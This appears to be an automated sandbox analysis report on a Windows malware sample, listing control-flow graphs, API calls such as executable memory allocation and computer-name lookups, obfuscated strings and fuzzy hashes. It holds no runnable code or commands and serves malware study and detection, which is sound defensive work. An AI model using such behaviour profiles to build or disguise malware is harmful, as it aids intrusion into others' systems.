                    control_flow_graph 222 3b95e0-3b95f3 223 3b95f9-3b9605 222->223 224 3b9ca5-3b9cac 222->224 225 3b9607-3b9609 223->225 226 3b9635-3b9642 223->226 227 3b960b-3b9633 225->227 228 3b9644-3b964b 225->228 229 3b968f-3b9707 call 3b64f0 call 3df2f0 call 3b8550 226->229 230 3b964d-3b9662 227->230 228->230 231 3b9664-3b968a 228->231 238 3b9709 229->238 239 3b9742-3b9796 call 3b8ec0 229->239 230->229 231->229 240 3b9710-3b9740 238->240 243 3b9798 239->243 244 3b97cc-3b981a call 3b8ec0 239->244 240->239 240->240 245 3b97a0-3b97ca 243->245 248 3b9859-3b98b0 call 3b8ec0 244->248 249 3b981c-3b981f 244->249 245->244 245->245 253 3b9902-3b993e 248->253 254 3b98b2 248->254 251 3b9820-3b9857 249->251 251->248 251->251 256 3b9940-3b9985 253->256 257 3b9987-3b99d8 call 3b8ec0 253->257 255 3b98c0-3b9900 254->255 255->253 255->255 256->256 256->257 260 3b99da 257->260 261 3b9a18-3b9ba9 call 3b91b0 257->261 262 3b99e0-3b9a16 260->262 265 3b9bab 261->265 266 3b9be3-3b9c2e 261->266 262->261 262->262 269 3b9bb0-3b9be1 265->269 267 3b9c78-3b9c96 call 3bddd0 call 3b8560 266->267 268 3b9c30-3b9c76 266->268 273 3b9c9b-3b9c9e 267->273 268->267 268->268 269->266 269->269 273->224
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: %I8O$&QaW$)M:S$*E0K$,Y+_$0$1A;G$<U%[$E-^3$J9S?$X)\/$b5K;$c%U+$m]8c
                    • API String ID: 0-997815367
                    • Opcode ID: ab62a5a0ddb8e176dc3a0db865cf8f9073b55528b7d77779d736779f00cafe9c
                    • Instruction ID: 36261d4fe83dd217269e58ed13e91cbd1cc3c0a8ccd772219741dd4e5f9e2dc9
                    • Opcode Fuzzy Hash: ab62a5a0ddb8e176dc3a0db865cf8f9073b55528b7d77779d736779f00cafe9c
                    • Instruction Fuzzy Hash: 3F0213B02183818BE325CF14C4A4BAFBBE5BBC2348F144D1DE6D58B692D779D509CB92

                    Control-flow Graph

                    control_flow_graph 387 3e24b2-3e24ba 388 3e25bf-3e25d1 387->388 389 3e24c0-3e24ca 387->389 391 3e25d4-3e268b NtAllocateVirtualMemory NtFreeVirtualMemory 388->391 390 3e24d0-3e24d7 389->390 392 3e24ec-3e2599 NtAllocateVirtualMemory NtFreeVirtualMemory 390->392 393 3e24d9-3e24dd 390->393 392->388 395 3e259b-3e25a3 392->395 393->390 394 3e24df-3e24e1 393->394 394->395 396 3e24e7 394->396 399 3e25b0-3e25b7 395->399 396->388 399->391 400 3e25b9-3e25bd 399->400 400->388 400->399
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E2543
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E258B
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E262B
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E2673
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: 4JC
                    • API String ID: 292159236-962601979
                    • Opcode ID: a81bf9ddf7986d120f71c31fae18e1c522ff789632074fe019961e8af1ab8fac
                    • Instruction ID: b7d4a7f1509e7ade4a2ae972bf8da00945e28c11de24573b02e4633c1f61ebe5
                    • Opcode Fuzzy Hash: a81bf9ddf7986d120f71c31fae18e1c522ff789632074fe019961e8af1ab8fac
                    • Instruction Fuzzy Hash: 43512471200B018FD736CF15C855B27B7E8AB08318F148B1CE9A68BAE0D7B4E949CB94

                    Control-flow Graph

                    control_flow_graph 401 3d12e2-3d12ea 402 3d12ec-3d12f2 call 3b8560 401->402 403 3d12f5-3d139f call 3e4a60 401->403 402->403 409 3d13f8-3d1401 403->409 410 3d13a1 403->410 412 3d141b-3d1427 409->412 413 3d1403-3d1409 409->413 411 3d13b0-3d13f6 410->411 411->409 411->411 415 3d1429-3d142f 412->415 416 3d143b-3d14d3 call 3b85d0 call 3e4a60 412->416 414 3d1410-3d1419 413->414 414->412 414->414 417 3d1430-3d1439 415->417 423 3d14d5 416->423 424 3d1527-3d1530 416->424 417->416 417->417 425 3d14e0-3d1525 423->425 426 3d154b-3d1557 424->426 427 3d1532-3d1538 424->427 425->424 425->425 429 3d1559-3d155f 426->429 430 3d156b-3d15e4 call 3e4a60 GetComputerNameExA 426->430 428 3d1540-3d1549 427->428 428->426 428->428 431 3d1560-3d1569 429->431 434 3d162e-3d1637 430->434 435 3d15e6 430->435 431->430 431->431 437 3d1639-3d163f 434->437 438 3d164b-3d1657 434->438 436 3d15f0-3d162c 435->436 436->434 436->436 439 3d1640-3d1649 437->439 440 3d1659-3d165f 438->440 441 3d166b-3d16c5 GetComputerNameExA 438->441 439->438 439->439 442 3d1660-3d1669 440->442 443 3d1729-3d1732 441->443 444 3d16c7 441->444 442->441 442->442 446 3d174b-3d1757 443->446 447 3d1734-3d173a 443->447 445 3d16d0-3d1727 444->445 445->443 445->445 449 3d1759-3d175f 446->449 450 3d176b-3d17ea 446->450 448 3d1740-3d1749 447->448 448->446 448->448 451 3d1760-3d1769 449->451 453 3d17ec-3d17ef 450->453 454 3d182e-3d1837 450->454 451->450 451->451 455 3d17f0-3d182c 453->455 456 3d1839-3d183f 454->456 457 3d184b-3d1857 454->457 455->454 455->455 458 3d1840-3d1849 456->458 459 3d1859-3d185f 457->459 460 3d186b-3d18ce call 3e4a60 457->460 458->457 458->458 461 3d1860-3d1869 459->461 465 3d1918-3d1921 460->465 466 3d18d0-3d1916 460->466 461->460 461->461 467 3d193b-3d1940 465->467 468 3d1923-3d1929 465->468 466->465 466->466 470 3d1966-3d1972 467->470 469 3d1930-3d1939 468->469 469->467 469->469 471 3d1a0e-3d1a10 470->471 472 3d1978-3d197c 470->472 473 3d1a14-3d1a6c 471->473 474 3d197e-3d199e 472->474 475 3d1950-3d1952 472->475 476 3d1a6e-3d1a6f 473->476 477 3d1ac2-3d1acb 473->477 479 3d19d0-3d19db 474->479 480 3d19a0-3d19a3 474->480 478 3d1957-3d1960 475->478 481 3d1a70-3d1ac0 476->481 482 3d1acd-3d1ad3 477->482 483 3d1aeb-3d1aee call 3d72c0 477->483 478->470 484 3d1a12 478->484 479->478 486 3d19e1-3d1a09 479->486 480->479 485 3d19a5-3d19c0 480->485 481->477 481->481 487 3d1ae0-3d1ae9 482->487 489 3d1af3-3d1b13 483->489 484->473 485->478 486->478 487->483 487->487
                    APIs
                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 003D159D
                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 003D1688
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ComputerName
                    • String ID: Tzrp$p}w/
                    • API String ID: 3545744682-1275741564
                    • Opcode ID: e76caf1e3c401536e06bada80da9fa74236a3d99a74fa8b4e4adc63e153024f5
                    • Instruction ID: d0be67e0ac3feba43744d30526e022b59620b99c8f69716767fdbf0b94e61988
                    • Opcode Fuzzy Hash: e76caf1e3c401536e06bada80da9fa74236a3d99a74fa8b4e4adc63e153024f5
                    • Instruction Fuzzy Hash: A6226C71104B808BE726CB39D494BE3BBE1BB16304F48899DD4FB8B287DB796509CB51

                    Control-flow Graph

                    control_flow_graph 490 3c9080-3c9090 491 3c9096-3c90d2 490->491 492 3c9140 490->492 493 3c90d4 491->493 494 3c9113-3c911f 491->494 495 3c9142-3c914b 492->495 496 3c90e0-3c9111 493->496 497 3c9120-3c912c 494->497 496->494 496->496 498 3c912e-3c9134 497->498 499 3c9136-3c9139 497->499 498->497 498->499 499->492 500 3c913b-3c913e 499->500 500->492 501 3c914c-3c9151 500->501 502 3c9160-3c9169 501->502 502->502 503 3c916b-3c9176 502->503 504 3c9180-3c9189 503->504 504->504 505 3c918b-3c9196 504->505 506 3c919f 505->506 507 3c9198-3c919d 505->507 508 3c91a1-3c91b4 call 3b8550 506->508 507->508 511 3c91b6-3c91bf 508->511 512 3c91d1-3c91df 508->512 513 3c91c0-3c91cf 511->513 514 3c9201-3c9224 call 3e5440 512->514 515 3c91e1-3c91e4 512->515 513->512 513->513 519 3c9278-3c927a 514->519 520 3c9226-3c9248 call 3b8550 call 3e5940 514->520 516 3c91f0-3c91ff 515->516 516->514 516->516 522 3c93f8-3c9404 call 3b8560 519->522 528 3c927f-3c9281 520->528 529 3c924a-3c9258 520->529 522->495 531 3c930d-3c9315 528->531 530 3c9260-3c9269 529->530 530->530 532 3c926b-3c926f 530->532 531->522 533 3c931b-3c9327 531->533 534 3c9286 532->534 535 3c9271-3c9276 532->535 536 3c9330-3c9337 533->536 537 3c9288-3c9299 call 3b8550 534->537 535->537 538 3c9339-3c933d 536->538 539 3c9344-3c93d1 NtAllocateVirtualMemory 536->539 544 3c929b-3c929e 537->544 545 3c92b1-3c92bf 537->545 538->536 541 3c933f 538->541 542 3c93d9-3c93f2 NtFreeVirtualMemory 539->542 541->522 542->522 548 3c92a0-3c92af 544->548 546 3c92e1-3c930a call 3b8c90 call 3b8560 * 2 545->546 547 3c92c1-3c92c4 545->547 546->531 549 3c92d0-3c92df 547->549 548->545 548->548 549->546 549->549
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C93A9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C93F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: >!$z9I;
                    • API String ID: 292159236-571071913
                    • Opcode ID: 15531b3e008800ee7f8ba7fd0adf239151943d3d0270fd6326a470d3fb1e3aa7
                    • Instruction ID: 1ba0fa01f7ddef9888346e4baf0e18f45629d89014fabb0d28e08881ae72fa7b
                    • Opcode Fuzzy Hash: 15531b3e008800ee7f8ba7fd0adf239151943d3d0270fd6326a470d3fb1e3aa7
                    • Instruction Fuzzy Hash: D391EFB15083159BD722DF14CC4ABABB7E4EF85324F0A491DE8919B391E374DD04C7A2

                    Control-flow Graph

                    control_flow_graph 556 3e5440-3e544b 557 3e5450-3e5459 556->557 557->557 558 3e545b-3e5462 557->558 559 3e546b 558->559 560 3e5464-3e5469 558->560 561 3e546e-3e549b call 3b8550 559->561 560->561 564 3e549d 561->564 565 3e54b2-3e552d 561->565 566 3e54a0-3e54b0 564->566 567 3e562d-3e563f call 3b8560 565->567 568 3e5533-3e553b 565->568 566->565 566->566 569 3e5540-3e5547 568->569 571 3e5549-3e554d 569->571 572 3e5554-3e5627 NtAllocateVirtualMemory NtFreeVirtualMemory 569->572 571->569 574 3e554f 571->574 572->567 574->567
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E55B5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5627
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: ,$@
                    • API String ID: 292159236-1227015840
                    • Opcode ID: a68bf346d6ffccd128e67b11b09f01effac4bc8d607d5d72fbbc3a5701115439
                    • Instruction ID: 860fd79a3e48a2a92c9534ec92191946ad0b19bd9e0b26db91dc1e139878d610
                    • Opcode Fuzzy Hash: a68bf346d6ffccd128e67b11b09f01effac4bc8d607d5d72fbbc3a5701115439
                    • Instruction Fuzzy Hash: 8C519CB11097009FD711CF14CC45B6BBBE9EF84318F158A1DF5A98B2E0E7B59A48CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CD90B
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CD962
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CDA21
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 003CDA74
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 9de6c55bcfddab35f7d795a2de90e5ddc7fce5bb78049d94642ba6b61696d8e2
                    • Instruction ID: 98c3b2bccd789b7273e29f7c5b711aef8360d3bca8823b8487c6e90e00c7ad15
                    • Opcode Fuzzy Hash: 9de6c55bcfddab35f7d795a2de90e5ddc7fce5bb78049d94642ba6b61696d8e2
                    • Instruction Fuzzy Hash: 5FD1CAB1A083118FE711CF18C881B6BBBE5EB85354F15892DF5999B390E7B4DD08CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E6108
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E6165
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E6226
                    • NtFreeVirtualMemory.NTDLL(000000FF,D2FF0000,00000010,00008000), ref: 003E627F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 825704c8399414a5f776b1ae9957733ed8b8e987a4d511a6c43e8d43213bd58b
                    • Instruction ID: 7cbd5c86a61b3c35b51e2e937ea71d98edc4d5b865b11d5c9cb86dd5478ae8aa
                    • Opcode Fuzzy Hash: 825704c8399414a5f776b1ae9957733ed8b8e987a4d511a6c43e8d43213bd58b
                    • Instruction Fuzzy Hash: 45B176752083659FD715CF19C881B2EB7E9FF98394F058A2CE9948B3A0D774E904CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E68C8
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E6926
                    • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 003E69EB
                    • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 003E6A45
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: f4791245cda22a2404188a24dd57c4c435f83bbaa25debbf06d8bdaff8863823
                    • Instruction ID: ae28c8e916eaa13243bbae75671cd41d41c5a758913f26c4ed85bfe4d2f6c139
                    • Opcode Fuzzy Hash: f4791245cda22a2404188a24dd57c4c435f83bbaa25debbf06d8bdaff8863823
                    • Instruction Fuzzy Hash: 3C91ACB16093249FC315CF19C841B2BB7E9EB84358F058A2CF9A99B3D0D7B49D05CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5DE5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5E43
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E5F0A
                    • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 003E5F67
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: cf6a51b9326befc9d1ad89021c1a1aa83d25588a81e67d02d266f7f2b7da6c19
                    • Instruction ID: 10c82c00781761f0503a62e5f4bfc6bafc8aad4a6e24ea566729e9caddd9113e
                    • Opcode Fuzzy Hash: cf6a51b9326befc9d1ad89021c1a1aa83d25588a81e67d02d266f7f2b7da6c19
                    • Instruction Fuzzy Hash: 7A918A712083619BD711CF19C880B2BB7E9EB88394F158A2CF9949B3E0D7B5D945CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E1029
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E1077
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 003E1142
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000010,00008000), ref: 003E1192
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 48e356700c1e866b0b24ce731246b0f0a3c37f65398a61e0dcf65c5565bd2605
                    • Instruction ID: 6eacea1c1944d8a5c469f1856f83404654b313fb2c95acf0439e440aa9d8732f
                    • Opcode Fuzzy Hash: 48e356700c1e866b0b24ce731246b0f0a3c37f65398a61e0dcf65c5565bd2605
                    • Instruction Fuzzy Hash: 196189B16083519FE311CF19CC40B2BB7E9EB88714F158A2DEAA49B3D0D7B09945CB96
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E2ACD
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E2B1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 2e240177f778a76fa40dbc9c1dfe314c3cdbb56ecc3906b3ff3c9fe7b9e3e1a9
                    • Instruction ID: 01e3c999f0bcb6a7590dc593be1b510ab3ca3fec9e68a75bbdf8f1c6968e2899
                    • Opcode Fuzzy Hash: 2e240177f778a76fa40dbc9c1dfe314c3cdbb56ecc3906b3ff3c9fe7b9e3e1a9
                    • Instruction Fuzzy Hash: 97512471101B109FE325CF15C895B27B7F8BB08314F158B1CE5A68BAE0D7B5A949CBA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: )$IDAT$IEND$IHDR
                    • API String ID: 0-3181356877
                    • Opcode ID: a66c65334b1b6ddfe36c841ce3fc1cf4552cb8871a535dab1fa0272f476d1424
                    • Instruction ID: fabcefcacc59bc09d7144dc9cd84607eefd995238f51b24c13b053278638d0e3
                    • Opcode Fuzzy Hash: a66c65334b1b6ddfe36c841ce3fc1cf4552cb8871a535dab1fa0272f476d1424
                    • Instruction Fuzzy Hash: 03022671A083808FD715CF28D890B9B7BE5EF85308F05862DFA858B792D779D909CB91
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5795
